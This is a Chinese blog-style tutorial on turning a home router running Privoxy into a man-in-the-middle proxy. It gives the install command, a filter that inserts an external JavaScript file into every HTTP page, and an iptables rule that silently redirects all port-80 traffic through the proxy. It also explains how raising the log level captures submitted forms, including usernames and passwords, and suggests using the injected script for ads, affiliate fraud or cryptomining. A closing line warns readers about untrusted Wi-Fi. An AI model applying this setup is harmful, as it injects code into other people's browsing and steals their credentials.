看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。
注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.
Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。
Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。
----来自百度百科
privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....
先上图..
环境:免费的K3刷官改版.
刷完系统后 安装 privoxy
命令:
opkg install privoxy
然后编辑 config 文件
vi /tmp/media/nand/opt/etc/privoxy/config
修改listen-address 为如下形式
listen-address 192.168.2.1:8118
accept-intercepted-requests 1
192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口
action 文件
vi /tmp/media/nand/opt/etc/privoxy/user.action
加入以下内容 代表拦截所有网址
+filter{ad}}
.*
filter文件
vi /tmp/media/nand/opt/etc/privoxy/user.filter
FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g
很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.
这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....
最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口
iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118
最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...
privoxy功能不只是修改网页内容,还可以记录访问记录..
甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..
修改config中的debug级别即可...(默认的日志只记录请求的url.)
至于privoxy还能干嘛,大家自己发挥吧...
所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..